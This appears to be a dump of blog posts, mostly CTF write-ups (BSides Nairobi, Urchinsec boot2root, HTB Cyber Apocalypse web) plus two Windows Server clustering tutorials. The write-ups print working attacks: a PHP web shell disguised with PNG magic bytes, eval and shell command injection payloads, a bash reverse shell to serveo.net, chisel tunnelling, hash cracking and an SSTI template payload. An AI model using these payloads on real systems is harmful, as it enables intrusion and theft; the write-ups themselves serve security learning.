\u0026#39;DB_HOST\u0026#39;, \u0026#39;localhost\u0026#39; ); /** Database charset to use in creating database tables. */ define( \u0026#39;DB_CHARSET\u0026#39;, \u0026#39;utf8\u0026#39; ); /** The database collate type. Don\u0026#39;t change this if in doubt. */ define( \u0026#39;DB_COLLATE\u0026#39;, \u0026#39;\u0026#39; ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define(\u0026#39;AUTH_KEY\u0026#39;, \u0026#39;\u0026amp;p`1\u0026amp;)?\u0026gt;Qk=gl`- GRBr^tuc~=M?CSa^jx *?9Tk`+pj?fndQg{\u0026amp;|~SUtf8+K9FN\u0026#39;); define(\u0026#39;SECURE_AUTH_KEY\u0026#39;, \u0026#39;Okb-xgA4s`znPZ7?gxIdM$)kQFHcvskp\u0026amp; )K67 -YM_rftdk#:0.0B}}q?VaK\u0026lt;z\u0026lt;\u0026#39;); define(\u0026#39;LOGGED_IN_KEY\u0026#39;, \u0026#39;%3$eB%Ne%]s1= `I{5vOs2? EBbn@\u0026amp;{|\u0026gt;.sO?is~XzAN%\u0026lt;O*x-}*k+v}@Xg9RMrD\u0026#39;); define(\u0026#39;NONCE_KEY\u0026#39;, \u0026#39;$#JLk_v+0T6?i)[sJ(Q#f--bsbIO`KS(\u0026gt;}Foz55T|QU-;+L_7sqr{7oEj/m$_.yF\u0026#39;); define(\u0026#39;AUTH_SALT\u0026#39;, \u0026#39;EdGSntZ*0j\u0026gt;pc\u0026lt;^-l^1q`6o^Yf]s|\u0026amp;2BI t|1nwes:i\u0026lt;$jLx*1tJ1~5p)C(}|U-k\u0026#39;); define(\u0026#39;SECURE_AUTH_SALT\u0026#39;, \u0026#39;+O%(gn.H`zB)znBcp^TR#5EjM`(C\u0026gt;\u0026amp;wX|BGD#rJX?v#bU;OLEzdeoD`.c1_i`Svo\u0026#39;); define(\u0026#39;LOGGED_IN_SALT\u0026#39;, \u0026#39;G5x3@)Uw`++abxv sAMrkZtS*`87cfDX\u0026gt;bh-L|SIN!/bZV*^[wC+] nyLP\u0026lt;e6JY]\u0026#39;); define(\u0026#39;NONCE_SALT\u0026#39;, \u0026#39;MXp}(a| 7+TGK9-f2-a9*7@Xv}$6h-N\u0026lt;Z13a@_KlF+|Ugo-3\u0026lt;jHcX\u0026lt;WO[hy?XG ]\u0026#39;); We can login to the database and read the wordpress users and their passwords. I found the following hash for admin_magharibi: $P$BHFeuYRoSbViPBhP11FqGR0OQ.6N981.\nI started cracking it in the background while i looked around.\nChecking the crontab\u0026hellip;\n1 0 0 * * 0 sshpass -p \u0026#39;vnG^W6q%zjt^S\u0026#39; ssh -o StrictHostKeychecking=no -o UserKnownHostsFile=/dev/null backup_svc@127.0.0.1 \u0026#34;cp -R /var/www/wordpress /wp_backup\u0026#34; as you can see teh backup_svc user password is exposed.\nLogin via ssh as backup_svc, checking what the user can run as sudo\u0026hellip;\n1 2 3 4 sudo -l we see that the can run any command as sudo without sudo password We get bash shell ad read the flag\n372ae41683bd87573a4902d1ed2d58ad\nPixel Blunder This challenge gave a web interface with a file upload functionality. Seeing this it should click immediately that we are testing file upload vulnerabilities.\nThe site was checking if the image was valid through the magic bytes.\nSo we need to craft a php shell with png magic bytes.\n1 \u0026lt;?php system($_GET[\u0026#39;cmd\u0026#39;]);?\u0026gt; You can use a full php reverseshell as the payload , i use this since ive mastered it offhead.\nAdd magic bytes at it now identifies as a png, ill leave the python script below for future reference\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 import argparse import os def add_hex_to_file(file_path, hex_string, position): # Convert hex string to bytes hex_data = bytes.fromhex(hex_string) # Read the original file content with open(file_path, \u0026#39;rb\u0026#39;) as f: original_content = f.read() # Modify content based on the specified position if position == \u0026#34;start\u0026#34;: modified_content = hex_data + original_content elif position == \u0026#34;end\u0026#34;: modified_content = original_content + hex_data elif position.isdigit(): offset = int(position) modified_content = original_content[:offset] + hex_data + original_content[offset:] else: raise ValueError(\u0026#34;Invalid position. Use \u0026#39;start\u0026#39;, \u0026#39;end\u0026#39;, or an integer for custom offset.\u0026#34;) # Write the modified content back to the file with open(file_path, \u0026#39;wb\u0026#39;) as f: f.write(modified_content) print(f\u0026#34;Hex data added to {file_path} at position: {position}\u0026#34;) if __name__ == \u0026#34;__main__\u0026#34;: parser = argparse.ArgumentParser(description=\u0026#34;Add hex data to a file at a specified position.\u0026#34;) parser.add_argument(\u0026#34;file\u0026#34;, help=\u0026#34;Path to the file to modify.\u0026#34;) parser.add_argument(\u0026#34;hex\u0026#34;, help=\u0026#34;Hex string to add.\u0026#34;) parser.add_argument(\u0026#34;position\u0026#34;, help=\u0026#34;Position to add hex data (\u0026#39;start\u0026#39;, \u0026#39;end\u0026#39;, or an integer for a custom offset).\u0026#34;) args = parser.parse_args() if not os.path.isfile(args.file): print(\u0026#34;File not found.\u0026#34;) else: add_hex_to_file(args.file, args.hex, args.position) Uploading the file we still get nothing.\nThere is still one more step\u0026hellip;.\nUploading the file the file-extension is stripped and if you know a php web server , it will not try to parse anyfile that doesnt have the proper php file extension.\nTHe trick for this is to use two extensions so that it strips one and leaves the other like \u0026ldquo;shell.php.php\u0026rdquo;\nWe get a shell and read the /flag.txt\nflag{7512a04d-5acd-45d9-b7ba-89467f2ba4ec}\nFaceoff In this challenge we are given a login page, username and password are admin:admin123 , my team mate got these from wherever.\nI solved this challenge ten minutes to time so i might not explain properly how i did this.\nAfter loggin in with the creds we are provided with a black page. Looking at the backend we can see that it uses flask . TIP: if you ever see flask in the backend most probably there is SSTI. So you have to look for user controlled input that is being diplayed in the page.\nThere was a hint for the chal , so i used the word \u0026ldquo;bsides\u0026rdquo; as a parameter\n1 2 http://3.88.113.117/do_something?bsides=\u0026lt;here goes your payload\u0026gt; Trying ssti payloads will give this error\n1 You have said: Error: unhashable type: \u0026#39;set I googled it and saw it was caused by python eval(). So we can get code execution by using the payload below\n1 http://3.88.113.117/do_something?bsides=__import__(\u0026#39;os\u0026#39;).system(\u0026#39;id\u0026#39;) Slap a reverse shell and you are good to go.\nThe flag wa hidden in \u0026ldquo;do_something/secret\u0026rdquo; , this i learnt after reading app.py file. Was lucky to get this 2 minutes before time\nflag: D0nt_4get_to_wear_Y0r_reflective_j4ck37s\n","date":"2024-10-26T17:13:14+03:00","image":"https://f0rk3b0mb.github.io/cover/perfect.png","permalink":"https://f0rk3b0mb.github.io/p/bsidesnrb2024/","title":"BsidesNrb2024"},{"content":"Windows Server High Availability Setup Part2\nCheck out part 1 \u0026raquo; here to be able to proceed to this stage\n1. Windows Server High Availability Setup of Roles Youll need to create a iscsi virtual hard disk through the domain controller and add it to the cluster , that step is in part 1\nMy disk is \u0026ldquo;cluster disk 1\u0026rdquo;\nFor this demonstration im going to make nginx web server application persistent across the nodes. So i copied nginx files to the cluster disk.\nThen create a role with the executable path and parameters start the nginx server\nGo to roles in failover cluster manager applucation and create an empty role. Then add resource in this case is a generic application. You can add services and native processes or even containers of you want those to be persistent.\nThen confirm, ensure the role is up with no errors.\nWith that we have configured nginx to be persistent across nodes. If you turn off node 1 it will be started in node 2 with all the data persistent across the nodes.\nFrom there you can setup the networking part of your appplication to ensure they can be accessed from other endpoints.\n","date":"2024-07-01T09:38:06+03:00","image":"https://f0rk3b0mb.github.io/cover/4020769.jpg","permalink":"https://f0rk3b0mb.github.io/p/windows_server_high_availability_cluster_part2/","title":"Windows_server_high_availability_cluster_part2"},{"content":"Windows Server High Availability Setup\n1 2 A failover cluster is a group of independent computers that work together to increase the availability and scalability of clustered roles (formerly called clustered applications and services). The clustered servers (called nodes) are connected by physical cables and by software. If one or more of the cluster nodes fail, other nodes begin to provide service (a process known as failover). In addition, the clustered roles are proactively monitored to verify that they are working properly. If they are not working, they are restarted or moved to another node. Here we are going to setup iscsi disks and a cluster with 2 node servers.\nThe disk can be physical or virtual , for this tutorial im going to use a virtual harddisk.\nYou will also need:\nvmware workstation 3 windows server operation systems (im using 2022) 1. Install required components We will need the following components:\nFile Server Iscsi Target Server Failover Clustering Active Directory Domain Services 2 setup Domain Controller Create a domain server and add the other 2 vms to the domain\nfollow this tutorials here to do the same \u0026raquo;\nsetup DC\nadd computer to domain\n1 2 3 4 5 6 7 Before you begin you have to set the dns server that can resolve the dc domain name in the network settings. For this instance the dns is the same as the ip of the DC controller. This will enable the other device to access the domain pingpong.local without need of specifying the ip address. You will also need to set a static iP address for the domain controller server. 3. Create Iscsi disk 1 iSCSI is an IP-based standard for transferring data that supports host access by carrying SCSI commands over IP networks. 4. Iscsi initialization We now need to initialize the disk on both instances\nUse the ip address we set for the DC to discover the iscsi instance.\nThen connect.\nThen go to windows \u0026ldquo;create and formart disk partition\u0026rdquo; application to initialize the disk.\n5. Setup Cluster We are going to setup the cluster. Make sure you login with domain user account in the nodes. If you dont you will get an error when creating the cluster.\nIm creating the cluster in node 1\nChoose you current computer as the cluster server\nThen add the disk that we had created earlier as storage.\n6. Configure cluster quorum Learn more about this \u0026raquo; here\n7. Connect nodes to Cluster Use same steps as in stage 5 to add a node to the cluster\nYou can do this clicking add node in the cluster that we just created in 5\n8. Test cluster If you shutdown on vm the disk become online on the other and vice versa. The status also changes to down or up depending on which node is up.\nThis is a succesful demonstration of setup of hight availability in windows server. This can be applied to lots of services and real time application. The one demonstarted above is high availability for storage device.\n","date":"2024-06-21T14:23:40+03:00","image":"https://f0rk3b0mb.github.io/cover/4020769.jpg","permalink":"https://f0rk3b0mb.github.io/p/windows_server_high_availability_cluster/","title":"Windows_server_high_availability_cluster"},{"content":"Writeup for urchinsec 2024 boot2root challenge This is the writeup for the boot 2 root challenge Bill Systems which i got the second solve.\nThis challneg requires knowledge in:\nrecon persistense lateral movement priviledge escalation Bill Systems categoty: boot2root difficulty: medium\nwe are given:\n1 2 3 SCOPE OF ENGAGEMENT domains : *.billsys.urc IP : 45.79.66.97 First we need to gather more info, so i ran an nmap scan to see open ports\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.7 (protocol 2.0) | ssh-hostkey: | 256 9e:cd:9e:38:58:35:4c:24:1a:01:29:0d:9d:26:fe:2b (ECDSA) |_ 256 50:35:25:83:7d:aa:d7:42:43:d4:bb:fa:e8:6c:12:bb (ED25519) 25/tcp filtered smtp 80/tcp open http |_http-title: Site doesn\u0026#39;t have a title (text/plain; charset=utf-8). | fingerprint-strings: | FourOhFourRequest: | HTTP/1.0 200 OK | Date: Sat, 27 Apr 2024 12:15:19 GMT | Content-Length: 0 | GenericLines, Help, Kerberos, LDAPSearchReq, LPDString, RTSPRequest, SIPOptions, SSLSessionReq, TLSSessionReq, TerminalServerCookie: | HTTP/1.1 400 Bad Request | Content-Type: text/plain; charset=utf-8 | Connection: close | Request | GetRequest: | HTTP/1.0 200 OK | Date: Sat, 27 Apr 2024 12:15:12 GMT | Content-Length: 0 | HTTPOptions: | HTTP/1.0 200 OK | Date: Sat, 27 Apr 2024 12:15:13 GMT |_ Content-Length: 0 443/tcp open https? 3000/tcp open ppp? | fingerprint-strings: | GenericLines, Help, RTSPRequest: | HTTP/1.1 400 Bad Request | Content-Type: text/plain; charset=utf-8 | Connection: close | Request | GetRequest: | HTTP/1.0 200 OK | Cache-Control: max-age=0, private, must-revalidate, no-transform | Content-Type: text/html; charset=utf-8 | Set-Cookie: i_like_gitea=7748aed9b1afa3fe; Path=/; HttpOnly; SameSite=Lax | Set-Cookie: _csrf=U5NJcsVjX-xLNIhZ6o64wSWiZd86MTcxNDIyMDExMzY5MDg3MDY4Nw; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax | X-Frame-Options: SAMEORIGIN | Date: Sat, 27 Apr 2024 12:15:13 GMT | \u0026lt;!DOCTYPE html\u0026gt; | \u0026lt;html lang=\u0026#34;en-US\u0026#34; data-theme=\u0026#34;gitea-auto\u0026#34;\u0026gt; | \u0026lt;head\u0026gt; | \u0026lt;meta name=\u0026#34;viewport\u0026#34; content=\u0026#34;width=device-width, initial-scale=1\u0026#34;\u0026gt; | \u0026lt;title\u0026gt;Gitea: Git with a cup of tea\u0026lt;/title\u0026gt; | \u0026lt;link rel=\u0026#34;manifest\u0026#34; href=\u0026#34;data:application/json;base64,eyJuYW1lIjoiR2l0ZWE6IEdpdCB3aXRoIGEgY3VwIG9mIHRlYSIsInNob3J0X25hbWUiOiJHaXRlYTogR2l0IHdpdGggYSBjdXAgb2YgdGVhIiwic3RhcnRfdXJsIjoiaHR0cDovL2dpdC5iaWxsc3lzLnVyYy8iLCJpY29ucyI6W3sic3JjIjoiaHR0cDovL2dpdC5iaWxsc3lzLnVyYy9hc3NldHMvaW1nL2xvZ28ucG5nIiwidHlwZSI6ImltYWdlL3BuZyIsInNpem | HTTPOptions: | HTTP/1.0 405 Method Not Allowed | Allow: HEAD | Allow: GET | Cache-Control: max-age=0, private, must-revalidate, no-transform | Set-Cookie: i_like_gitea=e41496a78b8b88ad; Path=/; HttpOnly; SameSite=Lax | Set-Cookie: _csrf=vUtLqCC5_VSGwBmhopYmXC6PyWM6MTcxNDIyMDEyMDUyMzg0MjU2Mw; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax | X-Frame-Options: SAMEORIGIN | Date: Sat, 27 Apr 2024 12:15:20 GMT |_ Content-Length: 0 3306/tcp open mysql MariaDB (unauthorized) 3333/tcp open nagios-nsca Nagios NSCA 2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service : ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== SF-Port80-TCP:V=7.94SVN%I=7%D=4/27%Time=662CEC50%P=x86_64-pc-linux-gnu%r(G SF:etRequest,4B,\u0026#34;HTTP/1\\.0\\x20200\\x20OK\\r\\nDate:\\x20Sat,\\x2027\\x20Apr\\x202 SF:024\\x2012:15:12\\x20GMT\\r\\nContent-Length:\\x200\\r\\n\\r\\n\u0026#34;)%r(HTTPOptions, SF:4B,\u0026#34;HTTP/1\\.0\\x20200\\x20OK\\r\\nDate:\\x20Sat,\\x2027\\x20Apr\\x202024\\x2012: SF:15:13\\x20GMT\\r\\nContent-Length:\\x200\\r\\n\\r\\n\u0026#34;)%r(RTSPRequest,67,\u0026#34;HTTP/1 SF:\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x20text/plain;\\x20charset SF:=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20Request\u0026#34;)%r(FourOhF SF:ourRequest,4B,\u0026#34;HTTP/1\\.0\\x20200\\x20OK\\r\\nDate:\\x20Sat,\\x2027\\x20Apr\\x20 SF:2024\\x2012:15:19\\x20GMT\\r\\nContent-Length:\\x200\\r\\n\\r\\n\u0026#34;)%r(GenericLine SF:s,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x20text/plain SF:;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20Request SF:\u0026#34;)%r(Help,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x20te SF:xt/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x2 SF:0Request\u0026#34;)%r(SSLSessionReq,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nCo SF:ntent-Type:\\x20text/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n SF:\\r\\n400\\x20Bad\\x20Request\u0026#34;)%r(TerminalServerCookie,67,\u0026#34;HTTP/1\\.1\\x20400 SF:\\x20Bad\\x20Request\\r\\nContent-Type:\\x20text/plain;\\x20charset=utf-8\\r\\n SF:Connection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20Request\u0026#34;)%r(TLSSessionReq,67, SF:\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x20text/plain;\\x20 SF:charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20Request\u0026#34;)%r( SF:Kerberos,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x20tex SF:t/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20 SF:Request\u0026#34;)%r(LPDString,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent SF:-Type:\\x20text/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n4 SF:00\\x20Bad\\x20Request\u0026#34;)%r(LDAPSearchReq,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20R SF:equest\\r\\nContent-Type:\\x20text/plain;\\x20charset=utf-8\\r\\nConnection:\\ SF:x20close\\r\\n\\r\\n400\\x20Bad\\x20Request\u0026#34;)%r(SIPOptions,67,\u0026#34;HTTP/1\\.1\\x204 SF:00\\x20Bad\\x20Request\\r\\nContent-Type:\\x20text/plain;\\x20charset=utf-8\\r SF:\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20Request\u0026#34;); ==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)============== SF-Port3000-TCP:V=7.94SVN%I=7%D=4/27%Time=662CEC51%P=x86_64-pc-linux-gnu%r SF:(GenericLines,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x SF:20text/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Ba SF:d\\x20Request\u0026#34;)%r(GetRequest,38A1,\u0026#34;HTTP/1\\.0\\x20200\\x20OK\\r\\nCache-Contr SF:ol:\\x20max-age=0,\\x20private,\\x20must-revalidate,\\x20no-transform\\r\\nCo SF:ntent-Type:\\x20text/html;\\x20charset=utf-8\\r\\nSet-Cookie:\\x20i_like_git SF:ea=7748aed9b1afa3fe;\\x20Path=/;\\x20HttpOnly;\\x20SameSite=Lax\\r\\nSet-Coo SF:kie:\\x20_csrf=U5NJcsVjX-xLNIhZ6o64wSWiZd86MTcxNDIyMDExMzY5MDg3MDY4Nw;\\x SF:20Path=/;\\x20Max-Age=86400;\\x20HttpOnly;\\x20SameSite=Lax\\r\\nX-Frame-Opt SF:ions:\\x20SAMEORIGIN\\r\\nDate:\\x20Sat,\\x2027\\x20Apr\\x202024\\x2012:15:13\\x SF:20GMT\\r\\n\\r\\n\u0026lt;!DOCTYPE\\x20html\u0026gt;\\n\u0026lt;html\\x20lang=\\\u0026#34;en-US\\\u0026#34;\\x20data-theme= SF:\\\u0026#34;gitea-auto\\\u0026#34;\u0026gt;\\n\u0026lt;head\u0026gt;\\n\\t\u0026lt;meta\\x20name=\\\u0026#34;viewport\\\u0026#34;\\x20content=\\\u0026#34;widt SF:h=device-width,\\x20initial-scale=1\\\u0026#34;\u0026gt;\\n\\t\u0026lt;title\u0026gt;Gitea:\\x20Git\\x20with\\x SF:20a\\x20cup\\x20of\\x20tea\u0026lt;/title\u0026gt;\\n\\t\u0026lt;link\\x20rel=\\\u0026#34;manifest\\\u0026#34;\\x20href=\\\u0026#34; SF:data:application/json;base64,eyJuYW1lIjoiR2l0ZWE6IEdpdCB3aXRoIGEgY3VwIG SF:9mIHRlYSIsInNob3J0X25hbWUiOiJHaXRlYTogR2l0IHdpdGggYSBjdXAgb2YgdGVhIiwic SF:3RhcnRfdXJsIjoiaHR0cDovL2dpdC5iaWxsc3lzLnVyYy8iLCJpY29ucyI6W3sic3JjIjoi SF:aHR0cDovL2dpdC5iaWxsc3lzLnVyYy9hc3NldHMvaW1nL2xvZ28ucG5nIiwidHlwZSI6Iml SF:tYWdlL3BuZyIsInNpem\u0026#34;)%r(Help,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\n SF:Content-Type:\\x20text/plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r SF:\\n\\r\\n400\\x20Bad\\x20Request\u0026#34;)%r(HTTPOptions,197,\u0026#34;HTTP/1\\.0\\x20405\\x20Me SF:thod\\x20Not\\x20Allowed\\r\\nAllow:\\x20HEAD\\r\\nAllow:\\x20GET\\r\\nCache-Cont SF:rol:\\x20max-age=0,\\x20private,\\x20must-revalidate,\\x20no-transform\\r\\nS SF:et-Cookie:\\x20i_like_gitea=e41496a78b8b88ad;\\x20Path=/;\\x20HttpOnly;\\x2 SF:0SameSite=Lax\\r\\nSet-Cookie:\\x20_csrf=vUtLqCC5_VSGwBmhopYmXC6PyWM6MTcxN SF:DIyMDEyMDUyMzg0MjU2Mw;\\x20Path=/;\\x20Max-Age=86400;\\x20HttpOnly;\\x20Sam SF:eSite=Lax\\r\\nX-Frame-Options:\\x20SAMEORIGIN\\r\\nDate:\\x20Sat,\\x2027\\x20A SF:pr\\x202024\\x2012:15:20\\x20GMT\\r\\nContent-Length:\\x200\\r\\n\\r\\n\u0026#34;)%r(RTSPR SF:equest,67,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nContent-Type:\\x20text/ SF:plain;\\x20charset=utf-8\\r\\nConnection:\\x20close\\r\\n\\r\\n400\\x20Bad\\x20Re SF:quest\u0026#34;); Only ports of interest were 22, 25 , 80 , 3306\non port 80 is bills portfolio other than that there is nothing interesting\nso we try and get the subdomains:\nThere are two subdomains :\ngit.billsys.urc - this is running a local instance of gittea storage.billsys.urc - this is running am instance of tiny file manager On git.billsys.urc we create an account and login. There are other users and repos but the one that sticks out is that of bill.\nIt is source code for a python web app called sesame.\nLooking at the commits we see a sqllite instance database that had been ommited we download it and view contents\ncracking the user hash we get the password\n1 ef92b778bafe771e89245b89ecbc08a44a4e166c06659911881f383d4473e94f : password123 On storage.billsys.urc we are provided with an instance of tiny file manager we also require creds to access it. *\n1 admin : admin@123 Here we can upload files , so i upload a php rev shell\nDropping to the shell we see that we are user \u0026ldquo;http\u0026rdquo;. There is no obvious method of priv esc.\nI was stuck here till i checked the open ports on the machine using netstat.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 127.0.0.54:53 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:5355 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.1:8080 0.0.0.0:* LISTEN 38132/python3 tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN - tcp6 0 0 :::5355 :::* LISTEN - tcp6 0 0 :::3306 :::* LISTEN - tcp6 0 0 :::22 :::* LISTEN - tcp6 0 0 :::3000 :::* LISTEN - tcp6 0 0 :::3333 :::* LISTEN - As you see above there is a service on port 80 that is only accessed internally.\nTo access this from our attack box we will need to use a tunnel client like chisel. You can get chisel \u0026raquo; here\n1 2 on attackbox \u0026gt;\u0026gt; ./chisel server -p 8000 --reverse on chal machine \u0026gt;\u0026gt; ./chisel client \u0026lt;ip\u0026gt;:8000 R:8001:127.0.0.1:8080 After this we can access the service on port 80 which is the sesame application we got the src earlier.\nOn the sesame applicatiion we login with the creds we found in the sqlite db file.\nIf you read the src this application is used by bill to read files in the server.\nThere is nothing else interesting so i looked through the source code.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 in main.py def dashboard(): if request.method == \u0026#34;GET\u0026#34;: return render_template(\u0026#39;dash.html\u0026#39;) if request.method == \u0026#34;POST\u0026#34;: key = request.form.get(\u0026#34;key\u0026#34;) file_read = request.form.get(\u0026#34;fileread\u0026#34;) check_key = SesameKey.query.filter_by(key=key).first() if check_key is not None: num = 107 stk = chr(num) secret = \u0026#39;\u0026#39;.join([chr(ord(x) ^ ord(stk)) for x in key]) with open(\u0026#34;temp_secret\u0026#34;, \u0026#34;w\u0026#34;) as temp: temp.write(secret) command = f\u0026#34;sudo sesame -i temp_secret -r {file_read}\u0026#34; run = subprocess.check_output(command, shell=True) run = run.decode(\u0026#39;utf-8\u0026#39;) os.system(f\u0026#34;rm -rf temp_secret\u0026#34;) return render_template(\u0026#39;dash.html\u0026#39;, message=\u0026#34;It Works\u0026#34;) else: return render_template(\u0026#39;dash.html\u0026#39;, message=\u0026#34;Wrong Key\u0026#34;) If you look carefully our user input is not being sanitized and it is being put directly to subprocess module. Seeing this you immediately think command execution.\nThe catch is that the output of a command you run will not be displayed.\nSo after some trial i created:\n1 key=IpwnEazy@@#TH!ngG5~\u0026amp;fileread=/etc/passwd; bash -c \u0026#34;bash -i \u0026gt;\u0026amp; /dev/tcp/serveo.net/33997 0\u0026gt;\u0026amp;1\u0026#34;\u0026amp;action= This gets us a reverse shell. We are now the user bill. From here i created ssh keys so that i could login via ssh which is better and more stable.\nOur target now us to achieve root.\nRunning sudo -l we can see that our user can run \u0026ldquo;sesame\u0026rdquo; command with sudo rights.\nThis command is used earlier in the python application\n1 2 3 Running : sudo sesame -i temp_secret -r /etc/shadow Note: shadow file is only read by root so with this command we can read files as the root user. 1 2 3 4 5 6 7 8 9 Error: -i is a required argument Usage of sesame: -h\tPrints This Output -i string Input Secret File To Read Secret (-i /path/to/secret.txt) -r string File To Read (-r /path/to/filetoread.txt) -s\tChange Permissions Of Files It also supports changing of file permissions with -s flag.\nSO in order to read the root flag we can exploit this. So after some trial and error i did this\n1 2 3 4 5 6 7 8 9 10 11 12 sudo sesame -i temp_secret -s When it prompts for a file enter ../../../../../../root/. When it prompts for permission 777 This above will make the root permission be rwx by everyone.\n1 . (dot): This refers to the current directory. For example, if you\u0026#39;re in the directory /home/user, then . refers to /home/user. From here you can read the root flag\nflag : urchinsec{I_know_CTF_This_S3rV35_IS_we334akK_NEXTTTT}\n","date":"2024-04-28T18:07:14+03:00","image":"https://f0rk3b0mb.github.io/cover/urchinsec.png","permalink":"https://f0rk3b0mb.github.io/p/urchinsec_2024/","title":"Urchinsec_2024"},{"content":"This is the writeup of HTB cyber apocalypse 2024 web challenges.\nI participated with my team \u0026ldquo;Gang de la Sinfonia\u0026rdquo;.\nWeb Category TimeKORP rating: very easy\nHere you are provided with a webpage that has a parameter ?format=%H:%M:%D , from the source code it was running linux date command from that syntax.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 \u0026lt;?php class TimeModel { public function __construct($format) { $this-\u0026gt;command = \u0026#34;date \u0026#39;+\u0026#34; . $format . \u0026#34;\u0026#39; 2\u0026gt;\u0026amp;1\u0026#34;; } public function getTime() { $time = exec($this-\u0026gt;command); $res = isset($time) ? $time : \u0026#39;?\u0026#39;; return $res; } } This is classic command injection.\n1 payload : %H:%M:%D\u0026#39;;cat flag.txt flag: HTB{t1m3_f0r_th3_ult1m4t3_pwn4g3}\nKORP terminal rating: very easy\nFor this challnge you are provided with a login page that requires a username and password. So it has to be login bypass.\nGiven the rating of this challenge just throw sqlmap at it. You can also confirm this by using a single quote ,it return a sql error.\nOutput from slqmap\nFrom this we get a user admin and the password hash.\n1 admin: $2b$12$OF1QqLVkMFUwJrl1J1YG9u6FdAQZa6ByxFt/CkS/2HW8GA563yiv. 1 2 3 hashcat -m 3200 hashcat.txt /usr/share/wordlists/rockyou.txt $2b$12$OF1QqLVkMFUwJrl1J1YG9u6FdAQZa6ByxFt/CkS/2HW8GA563yiv.:password123 Cracking the password using hashcat we get the password : password123\nWe can then login to get the flag\nflag: HTB{t3rm1n4l_cr4ck1ng_sh3n4nig4n5}\nFlag command rating: very easy\nHere we are given an applicating that requires a bunch of commands to navigate a puzzle. When you intercept the traffic using burp you will see an endpoint with a list of the commands.\nHere we can see a secret command. Using it\u0026hellip;\nflag: HTB{D3v3l0p3r_t00l5_4r3_b35t_wh4t_y0u_Th1nk??!}\nLabrinth Linguist rating: easy\nHere we are given a webapp that translates text that we give it.\nOooooh its a java application. I wasnt expecting thsi to be straight forward. But \u0026hellip;\n1 2 3 4 5 6 7 String template = \u0026#34;\u0026#34;; try { template = readFileToString(\u0026#34;/app/src/main/resources/templates/index.html\u0026#34;, textString); } catch (IOException e) { e.printStackTrace(); } Our input was being used in a template. This is dangerous if no filters are applied. I quickly googled SSTI in java (Server Side Template Injection) payloads. Got this \u0026raquo; here .\nFrom here we can execute commands and cat the flag. Credits to Anshul for doing this. I had a problem using the payload in burp suite due to the newlines.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 #set($s=\u0026#34;\u0026#34;) #set($stringClass=$s.getClass()) #set($stringBuilderClass=$stringClass.forName(\u0026#34;java.lang.StringBuilder\u0026#34;)) #set($inputStreamClass=$stringClass.forName(\u0026#34;java.io.InputStream\u0026#34;)) #set($readerClass=$stringClass.forName(\u0026#34;java.io.Reader\u0026#34;)) #set($inputStreamReaderClass=$stringClass.forName(\u0026#34;java.io.InputStreamReader\u0026#34;)) 